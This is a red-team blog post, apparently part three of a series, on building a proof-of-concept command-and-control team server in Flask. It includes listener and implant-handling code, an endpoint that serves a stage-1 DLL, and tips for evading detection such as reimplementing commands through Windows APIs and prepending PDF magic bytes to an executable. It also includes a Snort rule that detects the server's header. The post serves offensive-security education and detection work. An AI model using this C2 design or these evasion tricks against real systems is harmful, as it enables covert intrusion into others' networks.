Maelstrom #3: Building the Team Server

In this post we are discussing building a C2 Teamserver, common pitfalls, and the difficulty of identifying singular malicious requests.


In the previous post, Maelstrom: The C2 Architecture, we discussed the general architecture for a Command & Control Framework, including connections from the implant to the server and the execution flow of the implant itself. This post will continue this architecture discussion, this time looking at the further C2 development considerations around the user interface and experience. We'll also (lightly!) look at designing and protecting the C2's communication channels.


This post will cover:
  • choosing a user interface from command line, thick / thin clients, and browser-based UIs
  • choosing a language for the backend to manage the implants (and the interface)
  • deciding which actions the C2 will handle for the user, including:
      • listener initialisation
      • payload generation
      • communications security
  • the choices we made for Maelstrom
As we've mentioned previously, most of the discussions we're going to have in this series will focus on the offensive and defensive actions to take on the C2 implant. However, we still felt it would be worth looking at the points listed above because they are relevant to the implant's behaviour and security. We won't (in this post at any rate) look too much at redirectors, channels, and other parts of the red team infrastructure.

Important Concepts

Our preferred way of handling C2 communications is by using a simple API. HTTP exists in almost every client environment, and where it doesn't, traffic can be handled by intermediary devices (such as the aforementioned redirectors and channels which are so interesting that we won't discuss them here).
Our earlier choice to use an object oriented approach was partially informed by this decision, as the way we modelled the implant helped inform the structure our API should use. By using an OOP approach within the server as well, we found that the API architecture largely wrote itself. Ensuring that the API is written in a logical and predictable fashion makes future changes and additions so much simpler than having to un-spaghetti your spaghetti.
There are infinite ways to interact with a computer program, depending on how pedantic you feel like being. When it comes to C2s, there are three broad camps:
  • CLI (such as with Posh and Sliver)
  • Browser based GUI (such as with Covenant and Mythic)
  • Client based GUI (such as with Nighthawk, Brute Ratel C4, Havoc, and Cobalt Strike)
These are broad camps, and it's worth stating that a C2 can absolutely have both a command line interface and a graphical interface. Several C2s also support "virtual" CLI interfaces where a browser based GUI mimics or passes through a CLI.
These user interfaces are not necessarily tightly bound to the server itself. C2s, especially corporate C2s or those intended to be part of a wider red team infrastructure, will often come with a separate way to interact with a central "team server". A good example of this is Cobalt Strike, where the main team server is remotely accessed by a client on the operator's local machine.

Design Matters

This may all seem somewhat whimsical to discuss, but the design of the interface is important. It's the only way that the operators will be able to interact with the C2, and what is shown and not shown will influence its effectiveness. If the only way to properly secure traffic and implants is buried within submenus, while a quick and lazy option exists, an operator will use the quick and easy option. Even in situations where the default choice is a good one, heavy overreliance on a single technique can itself become an indicator of compromise or a fingerprint (such as the PowerShell persistence used by APT28).
With a clear design and a usable UI, opsec becomes more than just muscle memory and runes.

Choosing a frontend

The C2 Matrix has an Ask The C2 Matrix function which allows users to filter on all sorts of C2 components, with UI being one of them. As we've previously mentioned, there are three broad camps: CLI, Web GUI, and Client GUI.
Let's look at some examples of contemporary C2s which implement the different options, and some libraries which could help you achieve a similar experience:


[Examples of C2s and libraries worth a look for each option (CLI, Web Application, Client GUI) appeared here in the original post.]

Choosing a backend

In a real world scenario, the server software should be tested for its ability to handle requests in a timely fashion. For example, ThePrimeagen did a video called Go is faster than Rust??! Go vs Rust vs TypeScript Servers (as a scientist) which tested the loads between Go, Rust, and TypeScript. We would recommend a similar test for the teamserver.
For example, at around 5:34, Primeagen discusses the experiment in which 4 Linode machines make 800 connections each to a Golang and Rust Server. Each connection plays a game and measures how many active games were played:
Golang was able to handle the loads extremely well, whilst being easy to develop. Rust, on the other hand, was up and down whilst being a lot more difficult to actually write. Admittedly, this server was not a malware-oriented team server, but the data is still worth considering.
With that said, we are going to work with Flask/Python, purely out of ease for this demonstration.
One final note here before we move on to code - outside of what we're discussing, this code is deliberately dependent on insecure behaviours. Maelstrom is just for demonstration purposes. Some of these red herrings will become obvious throughout the next few blog posts.

Quick talk on Protocols

When it comes to communication, there are a multitude of protocols that should be considered.


First off, Hypertext Transfer Protocol (HTTP). HTTP is kind of perfect for C2 communications because data can be embedded in several parts of the request. This is something that most, if not all, C2s will support. Below are some locations in the request where data can be embedded:
  • URIs
  • Headers
  • Body
Let's take a look at an example:
GET /endpoint/form HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT)
Content-Type: application/x-www-form-urlencoded
Content-Length: length
Accept-Language: en-us
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
In this example from tutorialspoint, a form has been filled and posted to the server. If this was being used to mask C2 communication, an extra parameter could be added to the body.
As well as transferring C2 data effectively, HTTP is also great for obfuscating the location of the server with techniques such as Domain Fronting, although this is getting more difficult. That difficulty has spawned projects such as C3. We'll look at masking traffic further in later blogs.
To be honest, explaining HTTP specifically for C2 communication could be an entire blog in and of itself, so we will leave HTTP here. It is, however, the communication we will be using for our proof-of-concept.


Domain Name System (DNS) is another method that people tend to use for C2 communications.
This is something that Cobalt Strike natively supports which is explained like so:
Today, the DNS Beacon can download tasks over DNS TXT records, DNS AAAA records, or DNS A records. This payload has the flexibility to change between these data channels while its on target. Use Beacon’s mode command to change the current Beacon’s data channel. mode dns is the DNS A record data channel. mode dns6 is the DNS AAAA record channel. And, mode dns-txt is the DNS TXT record data channel. The default is the DNS TXT record data channel.
The only issue with this is that it's substantially slower than HTTP, but it can provide better protection as these channels are often less inspected than HTTP.


Server Message Block (SMB) is another protocol used for C2 communications. However, it's not used for the traditional data transfer. It is typically used for peer-to-peer, or implant-to-implant, communication. In order for this to work, one of the beacons needs to operate as a "server" which communicates out across HTTP/DNS to the teamserver. This allows subsequent implants to communicate with the implant in server-mode. This is particularly useful for getting around secure networks with limited ingress/egress, as well as daisy chaining implants together for less outbound traffic.
Similarly to DNS, this is something we aren't implementing. We do recommend implementing this protocol, however, whereas DNS is somewhat optional and dependent on the use case for the end-user.

Introducing Maelstrom

Maelstrom is quick and easy, and we don't need to consider the user experience since it'll be us, and briefly at that. So to make our lives easier, we'll show our workings with Flask, python-prompt-toolkit and Python 3.9. The advantage of Python is that, provided you can work out how to get Windows to stop installing Python from the Store, it's platform agnostic and quick to develop in. Given that Python is basically executable pseudo-code, this should also help illustrate our points.
Now that we have overloaded you with options, let's look into how Maelstrom is going to work.


First up, the server. This is the component that the implant will communicate with. So, when it is run in the terminal, the following is printed:
usage: Maelstrom [-h] {server,payload} ...
positional arguments:
{server,payload} Start Server | Generate Payloads
server Start the Maelstrom Server
payload Generate a Maelstrom Payload
optional arguments:
-h, --help show this help message and exit
- Run Server:
python3 server
- Generate Payload:
python3 payload
There are two options:
  • Run the server
  • Generate a payload
However, we are only implementing the server:
def main() -> None:
    args = Args.get_args()
    if args.which == 'server':
        run_maelstrom()


if __name__ == "__main__":
    main()
Let's step through run_maelstrom()...
The very first thing it does is get the available commands:
commands: dict = get_commands()
Where get_commands() is:
def get_commands() -> dict:
    """convert the list of commands into the complete data structure"""
    cs: dict = {}
    commands: list = available_commands()
    for command in commands:
        # key on the command name, value is the nested sub arguments
        cs[command.name] = command.sub_args
    return cs
This function parses the return of available_commands and builds out a dictionary of the required info.
In Maelstrom these commands are somewhat hardcoded, limiting its extensibility:
def available_commands() -> list:
    """Store all the commands and return as a list of dataclasses"""
    exit_cmd: Command = Command(
        'exit',
        'Exit Maelstrom', 'Exit Maelstrom',
        None
    )
    help_cmd: Command = Command(
        'help',
        'Show all the available commands',
        'Show all the available commands',
        None
    )
    set_cmd: Command = Command(
        'listener',
        'Start a new listener',
        'Start a new listener by specifying a host, port, uri, and password',
        None
    )
    show_cmd: Command = Command(
        'show',
        'Show listeners|implants',
        'Show listeners|implants',
        {
            "listeners": None,
            "implants": None
        }
    )
    # return all command dataclasses as a list
    return [exit_cmd, help_cmd, set_cmd, show_cmd]
Note the Command object, which is a dataclass:
from dataclasses import dataclass
from typing import Optional


@dataclass
class Command:
    """Dataclass to hold the command info"""
    # command name
    name: str
    # command description (long)
    long_desc: str
    # command description (short)
    short_desc: str
    # sub arguments (None when the command takes none)
    sub_args: Optional[dict]
This method does not provide any flexibility. In the case of Vulpes, the Factory Design Pattern is used. This enables the server to programmatically identify the commands, the info required, pre/post actions and so on. The reason we are pointing this out is that to make a C2 useful, it needs to be extendable. Maelstrom does not support that.
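To make the extensibility point concrete, here is a minimal sketch of a registry-style alternative to the hardcoded list. It is not how Vulpes or Maelstrom is implemented; the REGISTRY dictionary, the register decorator, the handler field, and the dispatch function are all hypothetical names introduced for illustration.

```python
from dataclasses import dataclass
from typing import Callable, Dict, Optional


@dataclass
class Command:
    """Same shape as Maelstrom's Command, plus a handler (an assumption)."""
    name: str
    long_desc: str
    short_desc: str
    sub_args: Optional[dict] = None
    handler: Optional[Callable[[str], str]] = None


# hypothetical registry: command name -> Command
REGISTRY: Dict[str, Command] = {}


def register(name: str, desc: str, sub_args: Optional[dict] = None):
    """Decorator that builds a Command and stores it in the registry."""
    def wrap(func: Callable[[str], str]) -> Callable[[str], str]:
        REGISTRY[name] = Command(name, desc, desc, sub_args, func)
        return func
    return wrap


@register("help", "Show all the available commands")
def do_help(_: str) -> str:
    # one line per registered command
    return "\n".join(f"{c.name}: {c.short_desc}" for c in REGISTRY.values())


@register("show", "Show listeners|implants", {"listeners": None, "implants": None})
def do_show(user_input: str) -> str:
    # placeholder behaviour: echo what would be shown
    return f"showing: {user_input.split(' ', 1)[-1]}"


def dispatch(user_input: str) -> str:
    """Look the first word up in the registry and call its handler."""
    name = user_input.split(" ", 1)[0]
    command = REGISTRY.get(name)
    if command is None or command.handler is None:
        return "Failed to find command!"
    return command.handler(user_input)
```

With this shape, adding a command means writing one decorated function; neither the prompt loop nor a central list needs to change.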
So, get_commands() again:
def get_commands() -> dict:
    """convert the list of commands into the complete data structure"""
    cs: dict = {}
    commands: list = available_commands()
    for command in commands:
        # key on the command name, value is the nested sub arguments
        cs[command.name] = command.sub_args
    return cs
The reason it rebuilds the dictionary in this way is because Maelstrom makes use of Prompt Toolkit and the commands then auto-populate the Nested Dictionary information.
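To illustrate why the nested dictionary shape is convenient, the sketch below walks such a dictionary to produce completion candidates using only the standard library. In Maelstrom this job is done by Prompt Toolkit; the suggest function here is a hypothetical stand-in, and the command names in the example dictionary are assumed from the prompt loop's checks.

```python
from typing import Dict, List, Optional

# nested structure in the shape get_commands() returns
Tree = Dict[str, Optional[dict]]


def suggest(tree: Tree, text: str) -> List[str]:
    """Return the candidate completions for the word currently being typed."""
    words = text.split(" ")
    node: Optional[dict] = tree
    # walk down the tree for every word that has already been completed
    for word in words[:-1]:
        if not node or word not in node:
            return []
        node = node[word]
    if not node:
        return []
    # offer the keys at this level that start with the partial word
    return sorted(k for k in node if k.startswith(words[-1]))


# assumed command names, with sub arguments only for 'show'
commands: Tree = {
    "exit": None,
    "help": None,
    "listener": None,
    "show": {"listeners": None, "implants": None},
}

print(suggest(commands, "show "))
```

Typing "show " offers the two sub arguments, while a command whose value is None offers nothing further.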
Running the server and typing help shows this:
These match up to the dataclasses seen earlier:
exit_cmd: Command = Command(
    'exit',
    'Exit Maelstrom', 'Exit Maelstrom',
    None
)
help_cmd: Command = Command(
    'help',
    'Show all the available commands',
    'Show all the available commands',
    None
)
set_cmd: Command = Command(
    'listener',
    'Start a new listener',
    'Start a new listener by specifying a host, port, uri, and password',
    None
)
show_cmd: Command = Command(
    'show',
    'Show listeners|implants',
    'Show listeners|implants',
    {
        "listeners": None,
        "implants": None
    }
)
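Because this is a lazy implementation of the server, the next thing to happen is a big while loop which gives a prompt and parses commands:
import getpass

from prompt_toolkit import prompt
from prompt_toolkit.completion import NestedCompleter

# build the completer from the nested command dictionary
completer = NestedCompleter.from_nested_dict(commands)
# bool used to control the while loop
execute: bool = True
# username to print
username: str = getpass.getuser()
# run until told otherwise
while execute:
    # get the user input
    user_input: str = prompt(f'[{username}]> ', completer=completer)
    # if nothing is passed, just continue
    if not user_input:
        continue
    # Exit
    if user_input.startswith('exit'):
        execute = False
    # Help
    elif user_input.startswith('help'):
        ...  # print the available commands
    # Listener
    elif user_input.startswith('listener'):
        handle_listener(user_input)
    # Show
    elif user_input.startswith('show'):
        ...  # list the listeners or implants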
The ONLY functionality Maelstrom provides is the ability to create listeners and show connected implants. However, let's discuss post-exploitation briefly (we discuss this in a bit more depth much later on in the series).
For the sake of the discussion, our example command will be whoami. If you were to go onto the C2 Matrix and pick a C2 that isn't .NET, you'd very likely get this:
cmd.exe /c whoami
Which will subsequently produce the following process tree:
-> implant.exe
-> cmd.exe
-> whoami.exe
Meaning every time this is run, it spawns two processes and produces T1059.003: Command and Scripting Interpreter: Windows Command Shell. Doing so would require the code to either use system() or call CreateProcessA() with cmd.exe as the target and /c whoami as the argument. Overall, that is a bunch of IOCs for such a simple command, when in reality the username that whoami prints can be retrieved with GetUserNameA:
BOOL GetUserNameA(
    [out] LPSTR lpBuffer,
    [in, out] LPDWORD pcbBuffer
);
So... why not use it:
CHAR lpUserName[MAX_PATH];
// size of the buffer, updated by the call
DWORD nSize = sizeof(lpUserName);
if (!GetUserNameA(lpUserName, &nSize))
    return NULL;
Moreover, the first thing 99% of people do when they receive an implant is an instinctive ls or whoami. By reimplementing commands, the potential IOCs are drastically reduced. This narrative spawned projects like CS-Situational-Awareness-BOF, CS-Remote-OPs-BOF, and C2-Tool-Collection.
Want to know the hostname? Then use GetComputerNameA(). Want to get the current process directory? Get it from the PEB:
std::string GetProcessCurrentDirectory() {
    // processParams points at the process parameters held in the PEB
    UNICODE_STRING us = processParams->CurrentDirectoryPath;
    // Length is in bytes, so halve it for the wide character count
    std::wstring ws(us.Buffer, us.Length / 2);
    std::string ss(ws.begin(), ws.end());
    return ss;
}
These are obviously simple commands, but let's say kerberoast is an internal command. Things like this can also be written in C (after all, much of Windows is written in C); see c2-tool-collection/BOF/Kerberoast.
More on this in a later part. For now, listeners!


Let's take a look at how we implemented listener creation. If the user input on the CLI starts with listener, then the handle_listener() function is called:
elif user_input.startswith('listener'):
    handle_listener(user_input)
The first thing it does is look for a space, as a rough check that arguments were passed:
def handle_listener(user_input: str) -> None:
    usage = 'Usage: listener <host> <port> <base uri> <password>'
    if ' ' not in user_input:
        print(usage)
        return
If that is fine, it then splits on the space and counts the length. If it's not 5, then the command is wrong:
    # split out the command
    split: list = user_input.split(' ')
    # make sure all the components are passed
    if len(split) != 5:
        print(usage)
        return
Note the usage here:
usage = 'Usage: listener <host> <port> <base uri> <password>'
A valid input would be:
listener <host> 5555 /some-uri PassWoRd1
As the first index, 0, should be the command name, it attempts to validate it:
    # use the first element to get the command object
    command: Command = get_a_command(split[0])
    # if it doesnt exist, return
    if not command:
        print('Failed to find command!')
        return
Like so:
def get_a_command(select: str) -> Command:
    """Get a specific command"""
    return [c for c in available_commands() if select == c.name]
The dataclass returned is never used; it is only checked to confirm that the command is valid. Now that it is, the Listener dataclass can be populated with the remaining arguments, like so:
    listener: Listener = Listener(random_string(), split[1], int(split[2]), split[3], split[4])
Where the dataclass is:
@dataclass
class Listener:
    """Dataclass to hold the listener info"""
    # name
    name: str
    # listener address
    address: str
    # port
    port: int
    # uri
    uri: str
    # password
    password: str
This is then appended to a global list:
    # add the listener to the list
    listeners.append(listener)
This is obviously not persistent. Realistically, this should be a database which is checked and restored if the server is restarted.
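As a rough idea of what that persistence could look like, here is a minimal sketch using the standard library's sqlite3 module. Maelstrom does not do this; the table layout and the open_db, save_listener, and load_listeners helpers are assumptions made for illustration, and the password is stored in plaintext only to mirror the demo.

```python
import sqlite3
from dataclasses import astuple, dataclass
from typing import List


@dataclass
class Listener:
    """Same fields as the Listener dataclass above."""
    name: str
    address: str
    port: int
    uri: str
    password: str


def open_db(path: str) -> sqlite3.Connection:
    """Open the database and create the (hypothetical) listeners table."""
    conn = sqlite3.connect(path)
    conn.execute(
        "CREATE TABLE IF NOT EXISTS listeners ("
        "name TEXT PRIMARY KEY, address TEXT, port INTEGER, uri TEXT, password TEXT)"
    )
    return conn


def save_listener(conn: sqlite3.Connection, listener: Listener) -> None:
    """Insert or update one listener; 'with conn' commits the transaction."""
    with conn:
        conn.execute(
            "INSERT OR REPLACE INTO listeners VALUES (?, ?, ?, ?, ?)",
            astuple(listener),
        )


def load_listeners(conn: sqlite3.Connection) -> List[Listener]:
    """Rebuild the in-memory list, for example after a server restart."""
    rows = conn.execute(
        "SELECT name, address, port, uri, password FROM listeners"
    ).fetchall()
    return [Listener(*row) for row in rows]


# in-memory database for the example; a file path would survive restarts
conn = open_db(":memory:")
save_listener(conn, Listener("abc123", "127.0.0.1", 5555, "/a", "password"))
restored = load_listeners(conn)
```

On startup the server would call load_listeners() and start a thread for each restored entry, instead of beginning with an empty list.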
Next, the dataclass is used as an argument for a thread:
    try:
        # start a thread pointing at the start_server function
        thread = threading.Thread(target=start_server, args=(listener,))
        thread.daemon = True
        thread.start()
        logger.good(f'Started: [{listener.name}] http://{listener.address}:{listener.port}{listener.uri} ({listener.password})')
    except Exception as e:
        logger.bad(f'Failed to start listener: {str(e)}')
This creates a thread on the start_server() function which registers the endpoint specified with the flask app using add_url_rule:
def start_server(listener: Listener) -> bool:
    """callback function to start a server"""
    # add the uri
    app.add_url_rule(listener.uri, view_func=comms)
    # start the app
    try:
        app.run(host=listener.address, port=listener.port, debug=False, threaded=True)
        return True
    except Exception:
        return False
This completes the listener creation:
This can be validated by running:
curl -s "" -H "X-Maelstrom: password"|xxd|head
Which produces:
So, how does the implant communicate with this?


As we've said, we aren't implementing anything to make this C2 useful; therefore we are leaving this component out. But we still want to discuss it. The help menu for Maelstrom has a positional argument, meaning that the actual file needs to be run again with the payload switch. This doesn't really comply with best practices for user experience, and a better workflow would be to do it from within the C2. For example, as a Web App, it's easy: use something like a modal, like we did in Vulpes, or popups like Cobalt Strike. If it's a CLI, then maybe some form of interactive prompt inside the C2 which works as a command, as we showed previously.
When it comes to automating the payload generation, we found the easiest way was to programmatically create a Makefile, copy all the source code files into /tmp, and execute the Makefile with something like:
if os.system(f"make -f {make_file_path} dll 2>/dev/null 1>&2") == 0:
Which will compile with MinGW-w64, then move the compiled implant and remove the temporary directory.
More on what to consider for payload generation in the next blog post.

Implant Communication

At this point in the post, we have an up-and-running team server which can create a listener. Now we need to look at what the endpoints actually do with incoming traffic to:
  • Determine if it's an implant
  • If it is, allow the implant to communicate
Handling HTTP Requests
Earlier in the post, we showed the listener being started as a new app, like so:
app.run(host=listener.address, port=listener.port, debug=False, threaded=True)
In a typical Flask fashion, app is defined globally:
app = Flask(__name__)
And one function on / is created to handle all requests. We could start an endpoint for each type, but we found it easier to listen at the root, and filter down with logic. This allows us to log ALL requests, whilst meticulously filtering requests by their expected values.
The route:
@app.route('/', methods=["GET"])
def comms() -> Response:
Let's run through what happens inside this route. In the previous section, we created an endpoint on /a, so we will use that example.
First thing that happens here is that a bunch of information is pulled from the request object, things that we may or may not use:
user_agent = request.environ["HTTP_USER_AGENT"]
verb = request.environ["REQUEST_METHOD"]
uri = request.environ["RAW_URI"]
remote_addr = request.environ["REMOTE_ADDR"]
remote_port = request.environ["REMOTE_PORT"]
server_name = request.environ["SERVER_NAME"]
server_port = request.environ["SERVER_PORT"]
url = request.url
header = request.headers.get('X-Maelstrom')
Note the request.headers.get call. This is one of the hard-coded values sent between the client and server.
This information is then passed to the is_valid_listener function:
if not is_valid_listener(listeners, uri, server_name, server_port, header): return response
This just ensures that the dataclass information matches up to the request by ensuring that the URI, Server Address, Server Port, and Header are all correct:
def is_valid_listener(listeners: list, uri: str, server_name: str, server_port: str, header) -> bool:
    """ensure that the request is valid for the endpoints."""
    for listener in listeners:
        # The 'in' here is important. This is what allows for the rest of the uri to be valid. I.E: /a?aaaaa would work.
        if listener.uri in uri and listener.address == server_name and str(listener.port) == server_port and listener.password == header:
            return True
    return False
This is an extremely primitive example of ensuring the request is as intended...
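To show just how primitive the substring check is, the sketch below compares it with a stricter variant. This is not Maelstrom's code: loose_match and strict_match are hypothetical helpers, and the stricter version (exact path comparison plus a constant-time header comparison) is only one possible tightening.

```python
import hmac
from dataclasses import dataclass
from typing import Optional
from urllib.parse import urlsplit


@dataclass
class Listener:
    """Same fields as the Listener dataclass above."""
    name: str
    address: str
    port: int
    uri: str
    password: str


def loose_match(listener: Listener, uri: str) -> bool:
    """The substring test used by is_valid_listener."""
    return listener.uri in uri


def strict_match(listener: Listener, uri: str, header: Optional[str]) -> bool:
    """Hypothetical stricter check: exact path and constant-time secret compare."""
    # compare only the path, so /a?stage still matches but /admin does not
    if urlsplit(uri).path != listener.uri:
        return False
    if header is None:
        return False
    return hmac.compare_digest(listener.password.encode(), header.encode())


listener = Listener("abc123", "127.0.0.1", 5555, "/a", "password")
```

Because "/a" is a substring of "/admin/anything", the loose check accepts paths the operator never registered, whereas the stricter check only accepts /a with an optional query string.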
If it is valid, then the next chunk of code determines which type of request this is:
switch: str = ''
# if no data is passed
if len(request.data) == 0:
    # check if the uri contains ?stage
    if check_uri_for_stage(uri):
        # if it does, set 'switch' to 'stage'
        switch = 'stage'
else:
    # otherwise, see whats going on in the json
    j = parse_json(request.data)
    if not j:
        return response
    if len(j.keys()) != 1:
        return response
    switch = list(j.keys())[0]
In this case, it only has two options:
  • init
  • stage
In a real world example, init and stage are terrible endpoints. But this allows us to illustrate our point. This is then followed up with:
# if the switch is init:
if switch == "init":
    # add the implant data to the 'db' and keep track of it
    response = initialise_implant(j, request)
elif switch == "stage":
    # otherwise if it's stage, return the dll
    response = get_maelstrom_dll()
else:
    # uh-oh...
    response = ""
# return the response
return response
If it's of type init, then initialise_implant() simply parses the info and prints a new connection, that's all:
def initialise_implant(j: dict, request) -> str:
    """Store the beacon info and return a success message"""
    try:
        processname: str = j["init"]["processname"]
        computername: str = j["init"]["computername"]
        username: str = j["init"]["username"]
        pid: int = j["init"]["dwpid"]
        remote_addr = request.environ["REMOTE_ADDR"]
        remote_port = request.environ["REMOTE_PORT"]
        uid = random_string()
        implant: Implant = Implant(uid, remote_addr, remote_port, processname, computername, username, pid)
        logger.good(f"New Implant: ({uid}) {computername}\\{username} @ {remote_addr}:{remote_port}")
        return "success"
    except Exception as e:
        logger.bad(f"Failed to add implant: {str(e)}")
        return "failure"
There is poor error handling, no database tracking, nothing. Realistically, here there is a requirement for logging. No matter the request, it should be logged into a uniform format. Typically, what we found best with our projects is to use a file where each line is a JSON Object:
{"example": 0}
{"example": 1}
{"example": 2}
{"example": 3}
{"example": 4}
This is then easy to process by either:
  • Looping over every line and loading each line as a JSON Object
  • Using something like Filebeat, and then either using Logstash:
input {
    beats {
        port => 5044
    }
    tcp {
        port => 5000
    }
    http {
        port => 5043
    }
}
filter {
    json {
        source => "message"
        tag_on_failure => [ "_parsefailure", "parsefailure-critical", "parsefailure-json_codec" ]
        remove_field => [ "message" ]
        skip_on_invalid_json => true
    }
}
output {
    elasticsearch {
        hosts => "elasticsearch:9200"
        user => "logstash_internal"
    }
}
Or a POST:
import json

import requests


def post_to_logstash(data: dict, url: str) -> bool:
    """Post the json to the logstash url"""
    try:
        response = requests.post(
            url, data=json.dumps(data), headers={"Content-Type": "application/json"}
        )
        return True
    except Exception as e:
        bad(f"Failed to post to {url}: {str(e)}")
        return False
Depending on the project, we will use one of these methods.
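For the simplest of these options, looping over the file line by line, a minimal sketch might look like the following. The append_event and read_events helpers and the requests.jsonl filename are hypothetical, not part of Maelstrom.

```python
import json
import os
import tempfile
from typing import Iterator


def append_event(path: str, event: dict) -> None:
    """Append one event to the log as a single JSON object per line."""
    with open(path, "a", encoding="utf-8") as f:
        f.write(json.dumps(event) + "\n")


def read_events(path: str) -> Iterator[dict]:
    """Yield each line of the log as a dict, skipping blank or corrupt lines."""
    with open(path, encoding="utf-8") as f:
        for line in f:
            line = line.strip()
            if not line:
                continue
            try:
                yield json.loads(line)
            except json.JSONDecodeError:
                # a partially written line should not stop processing
                continue


# write a few events to a temporary file and read them back
log_path = os.path.join(tempfile.mkdtemp(), "requests.jsonl")
for i in range(3):
    append_event(log_path, {"example": i})
events = list(read_events(log_path))
```

Because each line is independent, the file can be appended to while it is being tailed, and one bad line costs one event rather than the whole log.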
Moving on to the staging endpoint, the contents of a hardcoded path are returned:
def get_maelstrom_dll() -> bytes:
    """Read bytes from the DLL and return it!"""
    dllpath = Path('agent/stage1/bin/maelstrom.x64.dll')
    if not dllpath.exists():
        logger.bad(f"{dllpath} doesn't exist!")
        return b""
    dllbytes: bytes
    try:
        with open(dllpath, 'rb') as f:
            dllbytes = f.read()
    except Exception as e:
        logger.bad(f'Failed to get {dllpath}: {str(e)}')
        return b""
    if dllbytes:
        logger.info(f'Sending Stage 1 ({len(dllbytes)} bytes)!')
        return dllbytes
    return b""
Again, this is intentional. We don't care for making this fancy, it's a proof-of-concept. In the next section, we go over some methods of masking the DLL, and this is where that logic would go. But, for Maelstrom, we just return the bytes of a hard-coded DLL Path.
From here, multiple switches could be implemented to do specific jobs, like getting a new task or returning information about a task that was run. Each of these endpoints could be configured differently, giving flexibility within the communication.
To recap, in this section we've shown two hard-coded endpoints, init and stage, and then filtered down the requests based on expected information. To illustrate our point, we've just used X-Maelstrom as the header. But realistically this could just be a genuine header like ASPSESSIONID. All we are doing is making sure that only very specific requests can communicate with the teamserver.
Inspecting the requests
Using Wireshark, let's inspect our HTTP Requests. The following filter will find any HTTP requests between the C2 and the Dev Machine:
http && ip.src_host == && ip.dst_host ==
Remember, the only thing this does is stage. There are no additional requests:
The above shows the /a?stage URI being requested, along with our poorly configured headers:
GET /a?stage HTTP/1.1
Connection: Keep-Alive
User-Agent: Maelstrom
X-Maelstrom: password
And as this is a stage, if we follow it in TCP Stream...
Using Snort as an example, we can match that header and immediately identify Maelstrom with the following rule:
alert tcp any any -> any 5555 (content:"X-Maelstrom"; msg:"Maelstrom Header Detected!"; sid:10000100; rev:005;)
Which looks something like this:
There are tons of improvements that could be made here, and it could get complicated very quickly with all sorts of masquerading and cryptography. However, it doesn't need to be that complicated (some people may need it to be, though). As long as the HTTP Requests are fully customizable by the end-user, then the request can be crafted however it needs to be. For those complicated engagements with every log being ingested, then cool, the request can be worked to fix that. Don't need anything? Cool, then just request /stage.
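From the defender's side, the header match performed by the Snort rule above can be sketched in a few lines. This is a hypothetical illustration of why a static header is such an easy fingerprint, not a replacement for an IDS; parse_request and looks_like_maelstrom are names invented here, and the sample request mirrors the capture shown earlier.

```python
from typing import Dict, Tuple


def parse_request(raw: bytes) -> Tuple[str, Dict[str, str]]:
    """Split a raw HTTP request into its request line and lower-cased headers."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("iso-8859-1")
    lines = head.split("\r\n")
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        if ":" not in line:
            continue
        name, value = line.split(":", 1)
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers


def looks_like_maelstrom(raw: bytes) -> bool:
    """Flag requests carrying the static header or the static User-Agent."""
    _, headers = parse_request(raw)
    return "x-maelstrom" in headers or headers.get("user-agent") == "Maelstrom"


sample = (
    b"GET /a?stage HTTP/1.1\r\n"
    b"Connection: Keep-Alive\r\n"
    b"User-Agent: Maelstrom\r\n"
    b"X-Maelstrom: password\r\n\r\n"
)
benign = b"GET /index.html HTTP/1.1\r\nHost: example.com\r\nUser-Agent: curl/8.0\r\n\r\n"

print(looks_like_maelstrom(sample), looks_like_maelstrom(benign))
```

A single string match is enough to identify every request, which is exactly why the values sent between implant and server need to be configurable rather than hard-coded.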
This is one thing Cobalt Strike does do well with their Malleable Command and Control, specifically the HTTP Staging, where requests can be configured however the operator needs:
client {
    parameter "id" "1234";
    header "Cookie" "SomeValue";
}
What is particularly good is their chained data manipulation:
server {
    header "Content-Type" "image/gif";
    output {
        prepend "GIF89a";
    }
}
In the above, the GIF89a string, which is the magic bytes of a GIF, is prepended to the start of the output. Alternatively, the same could be done by prepending PNG magic bytes.
An example implementation with a PDF, assume the following data as the magic bytes for a PDF:
Converting it to bytes on CyberChef:
Then, with the following command, prepend those bytes to an EXE:
echo -n -e '\x25\x50\x44\x46\x2d\x31\x2e\x34' | /usr/bin/cat - maelstrom.unsafe.x64.exe > maelstrom.unsafe.pdf.exe
Finally, running file on both:
Now all that needs to happen is the first 8 bytes are removed from the buffer...